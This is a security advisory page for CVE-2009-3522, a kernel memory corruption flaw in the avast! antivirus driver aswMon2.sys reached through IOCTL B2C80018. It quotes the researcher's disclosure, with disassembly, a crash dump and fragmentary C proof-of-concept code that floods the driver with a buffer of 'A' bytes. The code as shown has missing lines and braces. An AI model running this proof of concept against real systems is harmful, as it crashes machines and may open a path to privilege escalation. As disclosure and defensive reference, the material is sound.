Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Security)  >   avast! Vendors:   ALWIL Software
avast! 'aswMon2.sys' IOCTL Memory Corruption Flaw May Let Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1022940
SecurityTracker URL:
CVE Reference:   CVE-2009-3522   (Links to External Site)
Updated:  Oct 6 2009
Original Entry Date:  Sep 24 2009
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Vendor Confirmed:  Yes  
Version(s): 4.8.1351.0; possibly other versions
Description:   A vulnerability was reported in avast!. A local user may be able to obtain elevated privileges.

A local user can supply a specially crafted B2C80018 IOCTL value to the 'aswMon2.sys' driver to trigger a memory corruption error in the kernel.

The vendor was notified on September 15, 2009.

The original advisory is available at:

Giuseppe 'Evilcry' Bonfa' reported this vulnerability.

Impact:   A local user may be able to obtain elevated privileges on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Avast aswMon2.sys kernel memory corruption and Local Privilege


-----------[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]--------->

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM<br>

***Disclosure Timeline***
Discover Date: Sep 13, 2009  PoC Code: Sep 13, 2009<br>
Vendor Notify: Sep 15,2009   Vendor Reply: Sep 15, 2009<br><br>

After various mails about publishing date
ignored, here the Public Disclosure.

Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
	 (untested) Local Privilege Escalation



Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and this lead to a kernel memory corruption that propagates
on the system with a BSOD and potential risk of Privilege Escalation.<br><br>

00010F70    cmp     [ebp+arg_C], 288h   ;InBuff Len no other checks performed<br>
00010F77    jnz     loc_111AC<br>
00010F7D    mov     esi, [ebp+SourceString]<br>
00010F80    cmp     [esi], ebx<br>
00010F82    mov     [ebp+arg_C], ebx<br><br>

Affected IOCTL is B2C80018<br><br>


Transfer Type: METHOD_BUFFERED<br><br>


WARNING: Stack unwind information not available. Following frames may be wrong.<br>
f76f3234 8053d251 f76f3250 00000000 f76f32a4 nt+0x600fa<br>
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251<br>
f76f3328 8052c793 41414141 00000000 f76f377c nt+0x55712<br>
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793<br><br>
f76f56d8 f7756a04 badb0d00 8055b256 00000000 nt+0x66251<br>
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04<br>
f76f5770 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5774 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5778 41414141 41414141 41414141 41414141 0x41414141<br>
f76f577c 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5780 41414141 41414141 41414141 41414141 0x41414141<br>


/ * Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption<br>
 * Author: Giuseppe 'Evilcry' Bonfa'<br>
 * E-Mail: evilcry _AT_ gmail _DOT_ com<br>
 * Website:<br>
 * <br>
 * Vendor: Notified<br>
 * No L.P.E. for kiddies<br>
 * /<br><br>

#define WIN32_LEAN_AND_MEAN<br>
#include < windows.h><br>
#include < stdio.h><br><br>

BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab<br>
	WCHAR DeviceName[MAX_PATH];<br>
	HANDLE hDevice;<br>

	if ((GetVersion() & 0xFF) >= 5) <br>
		wcscpy(DeviceName, L"\\\\.\\Global\\");<br>
	} <br>
	else <br>
		wcscpy(DeviceName, L"\\\\.\\");<br>

	wcscat(DeviceName, DriverName);<br>

	printf("Opening.. %S\n", DeviceName);<br>

	hDevice = CreateFileW(DeviceName, GENERIC_READ | <br>

	if (hDevice == INVALID_HANDLE_VALUE)<br>
		printf("CreateFile() ERROR %d\n", GetLastError());<br>
		return FALSE;<br>

	*lphDevice = hDevice;<br>

	return TRUE;<br>

int main()<br>
	HANDLE hDev = NULL;<br>
	DWORD Junk;<br>

		printf("Unable to access aswMon");<br>

	char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | <br>

	if (Buff)<br>
		memset(Buff, 'A', 0x288);<br>
		printf("DeviceIoControl Executed..\n");	<br>	
	}    <br>
		printf("VirtualAlloc() ERROR %d\n", GetLastError());<br>



Giuseppe 'Evilcry' Bonfa'


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC